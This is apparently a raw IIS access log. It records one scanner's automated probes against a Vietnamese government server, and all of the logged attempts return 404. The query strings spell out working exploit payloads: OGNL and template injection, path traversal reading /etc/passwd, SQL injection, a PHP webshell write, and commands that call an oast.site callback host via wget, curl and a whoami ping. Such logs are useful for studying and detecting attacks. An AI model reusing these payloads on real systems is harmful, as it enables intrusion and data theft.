Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 83 2023-08-03 18:50:36 103.153.214.94 GET /wp-content/plugins/quiz-master-next/README.md - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 62 2023-08-03 18:50:44 103.153.214.94 GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 57 2023-08-03 18:53:33 103.153.214.94 GET /oam/server/opensso/sessionservice - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 79 2023-08-03 18:58:33 103.153.214.94 POST /scgi-bin/platform.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 92 2023-08-03 18:58:41 103.153.214.94 POST /scgi-bin/platform.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 92 2023-08-03 19:06:57 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 79 2023-08-03 19:12:39 103.153.214.94 POST /admin/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 77 2023-08-03 19:18:11 103.153.214.94 GET /aB5uVJ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 76 2023-08-03 19:18:21 103.153.214.94 GET /heapdump - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 83 2023-08-03 19:18:28 103.153.214.94 GET /actuator/heapdump - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 81 2023-08-03 19:19:57 103.153.214.94 GET /computeMetadata/v1/project/ - 8172 - 111.90.143.37 - - 404 7 0 59 2023-08-03 19:20:06 103.153.214.94 GET /computeMetadata/v1/project/ - 8172 - 111.90.143.37 - - 404 7 0 65 2023-08-03 19:23:43 103.153.214.94 POST /opennms/j_spring_security_check - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/opennms/login.jsp 404 7 0 82 2023-08-03 19:26:58 103.153.214.94 POST /seeyon/htmlofficeservlet - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 85 2023-08-03 19:27:05 103.153.214.94 GET /seeyon/test123456.jsp pwd=asasd3344&2TSGVmZslQ9EKhNFi18CWB90dw9=ipconfig 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 79 2023-08-03 19:33:56 103.153.214.94 POST /apply_sec.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 115 2023-08-03 19:34:05 103.153.214.94 POST /apply_sec.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login_pic.asp 404 7 0 81 2023-08-03 19:34:14 103.153.214.94 POST /apply_sec.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login_pic.asp 404 7 0 53 2023-08-03 19:37:12 103.153.214.94 GET /dms/admin/accounts/payment_history.php account_id=2%27 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 56 2023-08-03 19:42:28 103.153.214.94 GET /index.php/install - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 124 2023-08-03 19:42:32 103.153.214.94 GET /concrete5/index.php/install - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 71 2023-08-03 19:47:45 103.153.214.94 GET /' - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 71 2023-08-03 19:48:40 103.153.214.94 POST /index.php s=captcha 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 134 2023-08-03 19:54:15 103.153.214.94 GET /login - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 115 2023-08-03 19:54:21 103.153.214.94 POST /Collector/diagnostics/trace_route - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 94 2023-08-03 20:00:10 103.153.214.94 GET /users/sign_in - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 126 2023-08-03 20:01:45 103.153.214.94 GET /appGet.cgi hook=get_cfg_clientlist() 8172 - 111.90.143.37 asusrouter-- https://bcvt.kontum.gov.vn:8172 404 7 0 172 2023-08-03 20:07:01 103.153.214.94 GET /flash/addcrypted2 - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 80 2023-08-03 20:07:08 103.153.214.94 POST /flash/addcrypted2 - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 79 2023-08-03 20:12:35 103.153.214.94 GET /api/system/deviceinfo - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 86 2023-08-03 20:14:25 103.153.214.94 POST /cobbler_api - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 79 2023-08-03 20:20:58 103.153.214.94 POST /api/user/reg - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 61 2023-08-03 20:21:06 103.153.214.94 GET /api/group/list - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 85 2023-08-03 20:25:48 103.153.214.94 POST /password_change.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 80 2023-08-03 20:27:49 103.153.214.94 GET / id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 62 2023-08-03 20:28:31 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 59 2023-08-03 20:39:07 103.153.214.94 GET /services/pluginscript/..;/..;/..;/getFavicon host=cj5gsq24749fn87ofdl0n4ofsaxbahjrn.oast.site 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 5 0 69 2023-08-03 20:41:30 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 62 2023-08-03 20:41:51 103.153.214.94 POST /webapi/auth - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 73 2023-08-03 20:42:53 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 5 0 87 2023-08-03 20:43:01 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/f5-release 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 5 0 54 2023-08-03 20:43:09 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/config/bigip.license 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 5 0 83 2023-08-03 20:43:25 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 76 2023-08-03 20:43:33 103.153.214.94 POST /tmui/locallb/workspace/fileSave.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 61 2023-08-03 20:43:40 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 236 2023-08-03 20:43:47 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 69 2023-08-03 20:46:12 103.153.214.94 GET /duomiphp/ajax.php action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(999999999))) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 86 2023-08-03 20:53:43 103.153.214.94 GET /remote/fgt_lang lang=/../../../..//////////dev/cmdb/sslvpn_websession 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 85 2023-08-03 20:57:00 103.153.214.94 GET /api/ping/;`id` - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 70 2023-08-03 21:00:22 103.153.214.94 POST /GponForm/diag_Form images/ 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 55 2023-08-03 21:00:29 103.153.214.94 POST /GponForm/diag_Form images/ 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 77 2023-08-03 21:05:57 103.153.214.94 GET /page id=2TSGV4lgQVMDBBAIjTKHHDnJ1vL&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://cj5gsq24749fn87ofdl06fmu1mewybguh.oast.site%27);s 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 72 2023-08-03 21:13:32 103.153.214.94 GET /OA_HTML/jsp/bsc/bscpgraph.jsp ifl=/etc/&ifn=passwd 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 61 2023-08-03 21:15:17 103.153.214.94 POST /RestAPI/LogonCustomization - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 77 2023-08-03 21:15:25 103.153.214.94 POST /RestAPI/LogonCustomization - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 101 2023-08-03 21:15:33 103.153.214.94 POST /RestAPI/Connection - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 76 2023-08-03 21:15:42 103.153.214.94 GET /help/admin-guide/test.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 103 2023-08-03 21:18:08 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 63 2023-08-03 21:26:18 103.153.214.94 GET / author=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 74 2023-08-03 21:26:25 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 77 2023-08-03 21:30:38 103.153.214.94 POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 58 2023-08-03 21:42:19 103.153.214.94 GET /nagiosxi/login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 76 2023-08-03 21:44:03 103.153.214.94 GET /ipython/tree - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 90 2023-08-03 21:49:05 103.153.214.94 GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 89 2023-08-03 21:54:14 103.153.214.94 POST /mifs/.;/services/LogService - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 64 2023-08-03 21:54:34 103.153.214.94 POST /login/index.php login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.cj5gsq24749fn87ofdl0c51ej4uyhgx8s.oast.site) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 76 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-08-03 22:00:26 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-08-03 22:00:26 103.153.214.94 POST /webtools/control/SOAPService - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 58 2023-08-03 22:03:52 103.153.214.94 GET /index.php a=fetch&content=%3C%3Fphp+file_put_contents%28%222TSGUp6DU2Ni37RYlzNdhnpAnMs.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 56 2023-08-03 22:03:58 103.153.214.94 GET /2TSGUp6DU2Ni37RYlzNdhnpAnMs.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 81 2023-08-03 22:05:22 103.153.214.94 POST / rest_route=/notificationx/v1/analytics 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 95 2023-08-03 22:08:27 103.153.214.94 POST /goform/setmac - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 https://bcvt.kontum.gov.vn:8172/index.htmlr 404 7 0 75 2023-08-03 22:16:24 103.153.214.94 POST /ajax/api/content_infraction/getIndexableContent - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 64 2023-08-03 22:20:37 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 83 2023-08-03 22:26:41 103.153.214.94 POST /ccmadmin/j_security_check - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn:8172/ccmadmin/showHome.do 404 7 0 60 2023-08-03 22:28:02 103.153.214.94 GET /goforms/menu - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 81 2023-08-03 22:33:10 103.153.214.94 GET /backupsettings.dat - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 79 2023-08-03 22:34:09 103.153.214.94 GET /forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 68 2023-08-03 22:34:17 103.153.214.94 GET /boards/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 84 2023-08-03 22:34:24 103.153.214.94 GET /board/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 61 2023-08-03 22:34:32 103.153.214.94 GET /forum/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 84 2023-08-03 22:34:41 103.153.214.94 GET /forums/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 67 2023-08-03 22:34:49 103.153.214.94 GET /vb/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 90 2023-08-03 22:39:48 103.153.214.94 GET /jexws/jexws.jsp ppp=cat+%2Fetc%2Fpasswd 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 72 2023-08-03 22:39:58 103.153.214.94 GET /jexws4/jexws4.jsp ppp=cat+%2Fetc%2Fpasswd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 56 2023-08-03 22:40:07 103.153.214.94 GET /jexinv4/jexinv4.jsp ppp=cat+%2Fetc%2Fpasswd 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 78 2023-08-03 22:40:16 103.153.214.94 GET /jbossass/jbossass.jsp ppp=cat+%2Fetc%2Fpasswd 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 54 2023-08-03 22:40:25 103.153.214.94 GET /jexws/jexws.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 77 2023-08-03 22:40:35 103.153.214.94 GET /jexws4/jexws4.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 80 2023-08-03 22:40:44 103.153.214.94 GET /jexinv4/jexinv4.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 54 2023-08-03 22:40:53 103.153.214.94 GET /jbossass/jbossass.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 105 2023-08-03 22:46:17 103.153.214.94 POST /classes/Login.php f=login 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 63 2023-08-03 22:46:22 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 262 2023-08-03 22:49:15 103.153.214.94 GET /portal/info.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 81 2023-08-03 23:01:15 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 83 2023-08-03 23:06:39 103.153.214.94 GET /login/ - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 54 2023-08-03 23:15:43 103.153.214.94 GET /include/makecvs.php Event=%60curl+http%3a//cj5gsq24749fn87ofdl0b1617f5bdee8y.oast.site+-H+'User-Agent%3a+QTyA05'%60 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 57 